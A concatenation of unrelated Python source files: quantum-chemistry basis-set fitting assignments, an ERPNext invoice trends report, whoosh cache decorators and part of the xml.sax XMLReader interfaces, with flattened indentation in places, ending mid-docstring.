basisfamily_list.append(basis_sadlejlpolds)
basisfamily_list.append(basis_sadlejlpolfl)
basisfamily_list.append(basis_sadlejlpolfs)
# Here lie practical (non-validated) fitting bases for
# Pople orbital basis sets
basis_sto3g.add_jkfit('def2-universal-JKFIT')
basis_sto3g.add_rifit('def2-SVP-RIFIT')
basis_321g.add_jkfit('def2-universal-JKFIT')
basis_321g.add_rifit('def2-SVP-RIFIT')
basis_631g.add_jkfit('cc-pvdz-jkfit')
basis_631g_d_.add_jkfit('cc-pvdz-jkfit')
basis_631g_d_p_.add_jkfit('cc-pvdz-jkfit')
basis_631gs.add_jkfit('cc-pvdz-jkfit')
basis_631gss.add_jkfit('cc-pvdz-jkfit')
basis_631g.add_rifit('cc-pvdz-ri')
basis_631g_d_.add_rifit('cc-pvdz-ri')
basis_631g_d_p_.add_rifit('cc-pvdz-ri')
basis_631gs.add_rifit('cc-pvdz-ri')
basis_631gss.add_rifit('cc-pvdz-ri')
basis_631pg.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pg_d_.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pg_d_p_.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pgs.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pgss.add_jkfit('heavy-aug-cc-pvdz-jkfit')
basis_631pg.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pg_d_.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pg_d_p_.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pgs.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631pgss.add_rifit('heavy-aug-cc-pvdz-ri')
basis_631ppg.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppg_d_.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppg_d_p_.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppgs.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppgss.add_jkfit('aug-cc-pvdz-jkfit')
basis_631ppg.add_rifit('aug-cc-pvdz-ri')
basis_631ppg_d_.add_rifit('aug-cc-pvdz-ri')
basis_631ppg_d_p_.add_rifit('aug-cc-pvdz-ri')
basis_631ppgs.add_rifit('aug-cc-pvdz-ri')
basis_631ppgss.add_rifit('aug-cc-pvdz-ri')
basis_6311g.add_jkfit('cc-pvtz-jkfit')
basis_6311g_d_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_d_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311gs.add_jkfit('cc-pvtz-jkfit')
basis_6311gss.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2d_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2d_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2d_2p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_2p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_2df_2pd_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_2p_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_2pd_.add_jkfit('cc-pvtz-jkfit')
basis_6311g_3df_3pd_.add_jkfit('cc-pvtz-jkfit')
basis_6311g.add_rifit('cc-pvtz-ri')
basis_6311g_d_.add_rifit('cc-pvtz-ri')
basis_6311g_d_p_.add_rifit('cc-pvtz-ri')
basis_6311gs.add_rifit('cc-pvtz-ri')
basis_6311gss.add_rifit('cc-pvtz-ri')
basis_6311g_2d_.add_rifit('cc-pvtz-ri')
basis_6311g_2d_p_.add_rifit('cc-pvtz-ri')
basis_6311g_2d_2p_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_p_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_2p_.add_rifit('cc-pvtz-ri')
basis_6311g_2df_2pd_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_p_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_2p_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_2pd_.add_rifit('cc-pvtz-ri')
basis_6311g_3df_3pd_.add_rifit('cc-pvtz-ri')
basis_6311pg.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_d_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_d_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pgs.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pgss.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2d_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2d_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2d_2p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_2p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_2df_2pd_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_2p_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_2pd_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg_3df_3pd_.add_jkfit('heavy-aug-cc-pvtz-jkfit')
basis_6311pg.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_d_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_d_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pgs.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pgss.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2d_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2d_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2d_2p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_2p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_2df_2pd_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_2p_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_2pd_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311pg_3df_3pd_.add_rifit('heavy-aug-cc-pvtz-ri')
basis_6311ppg.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_d_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_d_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppgs.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppgss.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2d_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2d_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2d_2p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_2p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_2df_2pd_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_2p_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_2pd_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg_3df_3pd_.add_jkfit('aug-cc-pvtz-jkfit')
basis_6311ppg.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_d_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_d_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppgs.add_rifit('aug-cc-pvtz-ri')
basis_6311ppgss.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2d_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2d_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2d_2p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_2p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_2df_2pd_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_2p_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_2pd_.add_rifit('aug-cc-pvtz-ri')
basis_6311ppg_3df_3pd_.add_rifit('aug-cc-pvtz-ri')
# Petersson's nZaPa-NR basis sets
basis_2zapa_nr = BasisFamily('2zapa-nr', zeta=2)
basis_3zapa_nr = BasisFamily('3zapa-nr', zeta=3)
basis_4zapa_nr = BasisFamily('4zapa-nr', zeta=4)
basis_5zapa_nr = BasisFamily('5zapa-nr', zeta=5)
basis_6zapa_nr = BasisFamily('6zapa-nr', zeta=6)
basis_7zapa_nr = BasisFamily('7zapa-nr', zeta=7)
# fitting sets for nZaPa-NR
# Dunning's zeta+1 to be safe, tested on water dimer;
# the full aug-JKFIT is possibly too much
#--------SCF-JKFIT error for nZaPa-NR
# results for GS energies of water dimer:
# delta_jk = E_conv - E_DFJK
# ZaPa zeta 2 : delta_jk = -0.000009
# ZaPa zeta 3 : delta_jk = -0.000002
# ZaPa zeta 4 : delta_jk = -0.000002
# ZaPa zeta 5 : delta_jk = -0.000002
# ZaPa zeta 6 : delta_jk = 0.000000
# ZaPa zeta 7 : delta_jk = 0.000000
basis_2zapa_nr.add_jkfit('aug-cc-pvtz-jkfit')
basis_3zapa_nr.add_jkfit('aug-cc-pvqz-jkfit')
basis_4zapa_nr.add_jkfit('aug-cc-pv5z-jkfit')
basis_5zapa_nr.add_jkfit('aug-cc-pv5z-jkfit')
basis_6zapa_nr.add_jkfit('aug-cc-pv6z-ri')
basis_7zapa_nr.add_jkfit('aug-cc-pv6z-ri')
basis_2zapa_nr.add_rifit('aug-cc-pvtz-ri')
basis_3zapa_nr.add_rifit('aug-cc-pvqz-ri')
basis_4zapa_nr.add_rifit('aug-cc-pv5z-ri')
basis_5zapa_nr.add_rifit('aug-cc-pv6z-ri')
basis_6zapa_nr.add_rifit('aug-cc-pv6z-ri')
basis_7zapa_nr.add_rifit('aug-cc-pv6z-ri')
basisfamily_list.append(basis_2zapa_nr)
basisfamily_list.append(basis_3zapa_nr)
basisfamily_list.append(basis_4zapa_nr)
basisfamily_list.append(basis_5zapa_nr)
basisfamily_list.append(basis_6zapa_nr)
basisfamily_list.append(basis_7zapa_nr)
# F12 basis sets
basis_cc_pvdz_f12 = BasisFamily('cc-pvdz-f12', zeta=2)
basis_cc_pvtz_f12 = BasisFamily('cc-pvtz-f12', zeta=3)
basis_cc_pvqz_f12 = BasisFamily('cc-pvqz-f12', zeta=4)
# basis_cc_pv5z_f12 = BasisFamily('cc-pV5Z-F12')
# ORCA manual suggests for F12 basis sets Dunning's zeta+1
basis_cc_pvdz_f12.add_jkfit('cc-pvtz-jkfit')
basis_cc_pvtz_f12.add_jkfit('cc-pvqz-jkfit')
basis_cc_pvqz_f12.add_jkfit('cc-pv5z-jkfit')
basis_cc_pvdz_f12.add_rifit('cc-pvtz-ri')
basis_cc_pvtz_f12.add_rifit('cc-pvqz-ri')
basis_cc_pvqz_f12.add_rifit('cc-pv5z-ri')
basisfamily_list.append(basis_cc_pvdz_f12)
basisfamily_list.append(basis_cc_pvtz_f12)
basisfamily_list.append(basis_cc_pvqz_f12)
# basisfamily_list.append(basis_cc_pv5z_f12)
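# A minimal sketch (added for exposition; attribute and parameter names are
# assumptions, not this module's actual definition) of the BasisFamily
# interface exercised above: an ornate name, an optional filename-style
# alias, an optional zeta level, and mutators recording fitting companions.
#
#     class BasisFamily(object):
#         def __init__(self, ornate, fullname=None, zeta=None):
#             self.ornate = ornate        # e.g. '6-311+G(2df,p)'
#             self.fullname = fullname    # e.g. '6-311pg_2df_p_' file alias
#             self.zeta = zeta            # cardinal quality of the basis
#             self.jfit = self.jkfit = self.rifit = None
#
#         def add_jfit(self, fit):   self.jfit = fit    # Coulomb fitting
#         def add_jkfit(self, fit):  self.jkfit = fit   # Coulomb/exchange fitting
#         def add_rifit(self, fit):  self.rifit = fit   # RI/MP2 fitting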
|
gangadhar-kadam/helpdesk-erpnext
|
refs/heads/master
|
erpnext/accounts/report/sales_invoice_trends/sales_invoice_trends.py
|
121
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from erpnext.controllers.trends import get_columns, get_data
def execute(filters=None):
	if not filters: filters = {}
data = []
conditions = get_columns(filters, "Sales Invoice")
data = get_data(filters, conditions)
return conditions["columns"], data
|
harshita-gupta/Harvard-FRSEM-Catalog-2016-17
|
refs/heads/master
|
flask/lib/python2.7/site-packages/whoosh/util/cache.py
|
95
|
# Copyright 2007 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from __future__ import with_statement
import functools, random
from array import array
from heapq import nsmallest
from operator import itemgetter
from threading import Lock
from time import time
from whoosh.compat import iteritems, xrange
try:
from collections import Counter
except ImportError:
class Counter(dict):
def __missing__(self, key):
return 0
def unbound_cache(func):
"""Caching decorator with an unbounded cache size.
"""
cache = {}
@functools.wraps(func)
def caching_wrapper(*args):
try:
return cache[args]
except KeyError:
result = func(*args)
cache[args] = result
return result
return caching_wrapper
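# Illustrative helper (added for exposition, not part of the original module):
# exercises unbound_cache on a toy recursive function. Arguments must be
# hashable and the cache dict grows without bound.
def _demo_unbound_cache():
    @unbound_cache
    def fib(n):
        return n if n < 2 else fib(n - 1) + fib(n - 2)
    first = fib(25)   # computed once per distinct args tuple
    second = fib(25)  # served straight from the cache dict
    assert first == second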
def lru_cache(maxsize=100):
"""A simple cache that, when the cache is full, deletes the least recently
used 10% of the cached values.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0] # Hits, misses
data = {}
lastused = {}
@functools.wraps(user_function)
def wrapper(*args):
try:
result = data[args]
stats[0] += 1 # Hit
except KeyError:
stats[1] += 1 # Miss
if len(data) == maxsize:
for k, _ in nsmallest(maxsize // 10 or 1,
iteritems(lastused),
key=itemgetter(1)):
del data[k]
del lastused[k]
data[args] = user_function(*args)
result = data[args]
finally:
lastused[args] = time()
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
def cache_clear():
data.clear()
lastused.clear()
stats[0] = stats[1] = 0
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
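# Illustrative usage (added for exposition): every *_cache decorator in this
# module exposes the same protocol -- cache_info() returns the tuple
# (hits, misses, maxsize, currsize) and cache_clear() empties the cache.
def _demo_lru_cache():
    @lru_cache(maxsize=4)
    def square(x):
        return x * x
    for x in (1, 2, 1, 3):
        square(x)
    assert square.cache_info() == (1, 3, 4, 3)  # one hit, three misses
    square.cache_clear()
    assert square.cache_info() == (0, 0, 4, 0)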
def lfu_cache(maxsize=100):
"""A simple cache that, when the cache is full, deletes the least frequently
used 10% of the cached values.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0] # Hits, misses
data = {}
usecount = Counter()
@functools.wraps(user_function)
def wrapper(*args):
try:
result = data[args]
stats[0] += 1 # Hit
except KeyError:
stats[1] += 1 # Miss
if len(data) == maxsize:
for k, _ in nsmallest(maxsize // 10 or 1,
iteritems(usecount),
key=itemgetter(1)):
del data[k]
del usecount[k]
data[args] = user_function(*args)
result = data[args]
finally:
usecount[args] += 1
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
def cache_clear():
data.clear()
usecount.clear()
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
def random_cache(maxsize=100):
"""A very simple cache that, when the cache is filled, deletes 10% of the
cached values AT RANDOM.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0] # hits, misses
data = {}
@functools.wraps(user_function)
def wrapper(*args):
try:
result = data[args]
stats[0] += 1 # Hit
except KeyError:
stats[1] += 1 # Miss
if len(data) == maxsize:
keys = data.keys()
for i in xrange(maxsize // 10 or 1):
n = random.randint(0, len(keys) - 1)
k = keys.pop(n)
del data[k]
data[args] = user_function(*args)
result = data[args]
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
def cache_clear():
data.clear()
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
def db_lru_cache(maxsize=100):
"""Double-barrel least-recently-used cache decorator. This is a simple
LRU algorithm that keeps a primary and secondary dict. Keys are checked
in the primary dict, and then the secondary. Once the primary dict fills
up, the secondary dict is cleared and the two dicts are swapped.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library.
Arguments to the cached function must be hashable.
View the cache statistics tuple ``(hits, misses, maxsize, currsize)``
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
# Cache1, Cache2, Pointer, Hits, Misses
stats = [{}, {}, 0, 0, 0]
@functools.wraps(user_function)
def wrapper(*args):
ptr = stats[2]
a = stats[ptr]
b = stats[not ptr]
key = args
if key in a:
stats[3] += 1 # Hit
return a[key]
elif key in b:
stats[3] += 1 # Hit
return b[key]
else:
stats[4] += 1 # Miss
result = user_function(*args)
a[key] = result
if len(a) >= maxsize:
stats[2] = not ptr
b.clear()
return result
def cache_info():
return stats[3], stats[4], maxsize, len(stats[0]) + len(stats[1])
def cache_clear():
"""Clear the cache and cache statistics"""
stats[0].clear()
stats[1].clear()
stats[3] = stats[4] = 0
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
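# Illustrative usage (added for exposition): once the primary dict reaches
# maxsize the pointer flips and the old secondary is cleared, so at most
# roughly 2 * maxsize results are ever held.
def _demo_db_lru_cache():
    @db_lru_cache(maxsize=2)
    def double(x):
        return 2 * x
    for x in (1, 2, 3):
        double(x)
    hits, misses, _, currsize = double.cache_info()
    # {1, 2} filled the primary, the dicts swapped, and 3 entered the fresh one
    assert (hits, misses, currsize) == (0, 3, 3)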
def clockface_lru_cache(maxsize=100):
"""Least-recently-used cache decorator.
This function duplicates (more-or-less) the protocol of the
``functools.lru_cache`` decorator in the Python 3.2 standard library, but
uses the clock face LRU algorithm instead of an ordered dictionary.
If *maxsize* is set to None, the LRU features are disabled and the cache
can grow without bound.
Arguments to the cached function must be hashable.
View the cache statistics named tuple (hits, misses, maxsize, currsize)
with f.cache_info(). Clear the cache and statistics with f.cache_clear().
Access the underlying function with f.__wrapped__.
"""
def decorating_function(user_function):
stats = [0, 0, 0] # hits, misses, hand
data = {}
if maxsize:
# The keys at each point on the clock face
clock_keys = [None] * maxsize
# The "referenced" bits at each point on the clock face
clock_refs = array("B", (0 for _ in xrange(maxsize)))
lock = Lock()
@functools.wraps(user_function)
def wrapper(*args):
key = args
try:
with lock:
pos, result = data[key]
# The key is in the cache. Set the key's reference bit
clock_refs[pos] = 1
# Record a cache hit
stats[0] += 1
except KeyError:
# Compute the value
result = user_function(*args)
with lock:
# Current position of the clock hand
hand = stats[2]
# Remember to stop here after a full revolution
end = hand
# Sweep around the clock looking for a position with
# the reference bit off
while True:
hand = (hand + 1) % maxsize
current_ref = clock_refs[hand]
if current_ref:
# This position's "referenced" bit is set. Turn
# the bit off and move on.
clock_refs[hand] = 0
elif not current_ref or hand == end:
# We've either found a position with the
# "reference" bit off or reached the end of the
# circular cache. So we'll replace this
# position with the new key
current_key = clock_keys[hand]
if current_key in data:
del data[current_key]
clock_keys[hand] = key
clock_refs[hand] = 1
break
# Put the key and result in the cache
data[key] = (hand, result)
# Save the new hand position
stats[2] = hand
# Record a cache miss
stats[1] += 1
return result
else:
@functools.wraps(user_function)
def wrapper(*args):
key = args
try:
result = data[key]
stats[0] += 1
except KeyError:
result = user_function(*args)
data[key] = result
stats[1] += 1
return result
def cache_info():
return stats[0], stats[1], maxsize, len(data)
        def cache_clear():
            """Clear the cache and cache statistics"""
            data.clear()
            stats[0] = stats[1] = stats[2] = 0
            if maxsize:
                for i in xrange(maxsize):
                    clock_keys[i] = None
                    clock_refs[i] = 0
wrapper.cache_info = cache_info
wrapper.cache_clear = cache_clear
return wrapper
return decorating_function
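# Illustrative usage (added for exposition): with maxsize=None the clock-face
# machinery is bypassed and the cache degenerates to a plain unbounded dict.
def _demo_clockface_unbounded():
    @clockface_lru_cache(maxsize=None)
    def identity(x):
        return x
    for x in (1, 2, 3, 1):
        identity(x)
    assert identity.cache_info() == (1, 3, None, 3)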
|
vlachoudis/sl4a
|
refs/heads/master
|
python/src/Lib/xml/sax/xmlreader.py
|
60
|
"""An XML Reader is the SAX 2 name for an XML parser. XML Parsers
should be based on this code. """
import handler
from _exceptions import SAXNotSupportedException, SAXNotRecognizedException
# ===== XMLREADER =====
class XMLReader:
"""Interface for reading an XML document using callbacks.
XMLReader is the interface that an XML parser's SAX2 driver must
implement. This interface allows an application to set and query
features and properties in the parser, to register event handlers
for document processing, and to initiate a document parse.
All SAX interfaces are assumed to be synchronous: the parse
methods must not return until parsing is complete, and readers
must wait for an event-handler callback to return before reporting
the next event."""
def __init__(self):
self._cont_handler = handler.ContentHandler()
self._dtd_handler = handler.DTDHandler()
self._ent_handler = handler.EntityResolver()
self._err_handler = handler.ErrorHandler()
def parse(self, source):
"Parse an XML document from a system identifier or an InputSource."
raise NotImplementedError("This method must be implemented!")
def getContentHandler(self):
"Returns the current ContentHandler."
return self._cont_handler
def setContentHandler(self, handler):
"Registers a new object to receive document content events."
self._cont_handler = handler
def getDTDHandler(self):
"Returns the current DTD handler."
return self._dtd_handler
def setDTDHandler(self, handler):
"Register an object to receive basic DTD-related events."
self._dtd_handler = handler
def getEntityResolver(self):
"Returns the current EntityResolver."
return self._ent_handler
def setEntityResolver(self, resolver):
"Register an object to resolve external entities."
self._ent_handler = resolver
def getErrorHandler(self):
"Returns the current ErrorHandler."
return self._err_handler
def setErrorHandler(self, handler):
"Register an object to receive error-message events."
self._err_handler = handler
def setLocale(self, locale):
"""Allow an application to set the locale for errors and warnings.
SAX parsers are not required to provide localization for errors
and warnings; if they cannot support the requested locale,
however, they must throw a SAX exception. Applications may
request a locale change in the middle of a parse."""
raise SAXNotSupportedException("Locale support not implemented")
def getFeature(self, name):
"Looks up and returns the state of a SAX2 feature."
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
"Sets the state of a SAX2 feature."
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def getProperty(self, name):
"Looks up and returns the value of a SAX2 property."
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
"Sets the value of a SAX2 property."
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
class IncrementalParser(XMLReader):
"""This interface adds three extra methods to the XMLReader
interface that allow XML parsers to support incremental
parsing. Support for this interface is optional, since not all
underlying XML parsers support this functionality.
When the parser is instantiated it is ready to begin accepting
data from the feed method immediately. After parsing has been
finished with a call to close the reset method must be called to
make the parser ready to accept new data, either from feed or
using the parse method.
Note that these methods must _not_ be called during parsing, that
is, after parse has been called and before it returns.
By default, the class also implements the parse method of the XMLReader
interface using the feed, close and reset methods of the
IncrementalParser interface as a convenience to SAX 2.0 driver
writers."""
def __init__(self, bufsize=2**16):
self._bufsize = bufsize
XMLReader.__init__(self)
def parse(self, source):
import saxutils
source = saxutils.prepare_input_source(source)
self.prepareParser(source)
file = source.getByteStream()
buffer = file.read(self._bufsize)
while buffer != "":
self.feed(buffer)
buffer = file.read(self._bufsize)
self.close()
def feed(self, data):
"""This method gives the raw XML data in the data parameter to
the parser and makes it parse the data, emitting the
corresponding events. It is allowed for XML constructs to be
split across several calls to feed.
feed may raise SAXException."""
raise NotImplementedError("This method must be implemented!")
def prepareParser(self, source):
"""This method is called by the parse implementation to allow
the SAX 2.0 driver to prepare itself for parsing."""
raise NotImplementedError("prepareParser must be overridden!")
def close(self):
"""This method is called when the entire XML document has been
passed to the parser through the feed method, to notify the
parser that there are no more data. This allows the parser to
do the final checks on the document and empty the internal
data buffer.
The parser will not be ready to parse another document until
the reset method has been called.
close may raise SAXException."""
raise NotImplementedError("This method must be implemented!")
def reset(self):
"""This method is called after close has been called to reset
the parser so that it is ready to parse new documents. The
results of calling parse or feed after close without calling
reset are undefined."""
raise NotImplementedError("This method must be implemented!")
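# A sketch (added for exposition) of the feed/close/reset lifecycle a concrete
# driver must honor; make_parser_somehow is a stand-in for obtaining an actual
# IncrementalParser instance, not an API defined here.
def _incremental_lifecycle_sketch(make_parser_somehow, chunks, more_chunks):
    parser = make_parser_somehow()  # ready to accept data immediately
    for chunk in chunks:
        parser.feed(chunk)          # may raise SAXException
    parser.close()                  # final checks; document is complete
    parser.reset()                  # mandatory before parsing another document
    for chunk in more_chunks:
        parser.feed(chunk)
    parser.close()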
# ===== LOCATOR =====
class Locator:
"""Interface for associating a SAX event with a document
location. A locator object will return valid results only during
calls to DocumentHandler methods; at any other time, the
results are unpredictable."""
def getColumnNumber(self):
"Return the column number where the current event ends."
return -1
def getLineNumber(self):
"Return the line number where the current event ends."
return -1
def getPublicId(self):
"Return the public identifier for the current event."
return None
def getSystemId(self):
"Return the system identifier for the current event."
return None
# ===== INPUTSOURCE =====
class InputSource:
"""Encapsulation of the information needed by the XMLReader to
read entities.
This class may include information about the public identifier,
system identifier, byte stream (possibly with character encoding
information) and/or the character stream of an entity.
Applications will create objects of this class for use in the
XMLReader.parse method and for returning from
EntityResolver.resolveEntity.
An InputSource belongs to the application, the XMLReader is not
allowed to modify InputSource objects passed to it from the
application, although it may make copies and modify those."""
def __init__(self, system_id = None):
self.__system_id = system_id
self.__public_id = None
self.__encoding = None
self.__bytefile = None
self.__charfile = None
def setPublicId(self, public_id):
"Sets the public identifier of this InputSource."
self.__public_id = public_id
def getPublicId(self):
"Returns the public identifier of this InputSource."
return self.__public_id
def setSystemId(self, system_id):
"Sets the system identifier of this InputSource."
self.__system_id = system_id
def getSystemId(self):
"Returns the system identifier of this InputSource."
return self.__system_id
def setEncoding(self, encoding):
"""Sets the character encoding of this InputSource.
The encoding must be a string acceptable for an XML encoding
declaration (see section 4.3.3 of the XML recommendation).
The encoding attribute of the InputSource is ignored if the
InputSource also contains a character stream."""
self.__encoding = encoding
def getEncoding(self):
"Get the character encoding of this InputSource."
return self.__encoding
def setByteStream(self, bytefile):
"""Set the byte stream (a Python file-like object which does
not perform byte-to-character conversion) for this input
source.
The SAX parser will ignore this if there is also a character
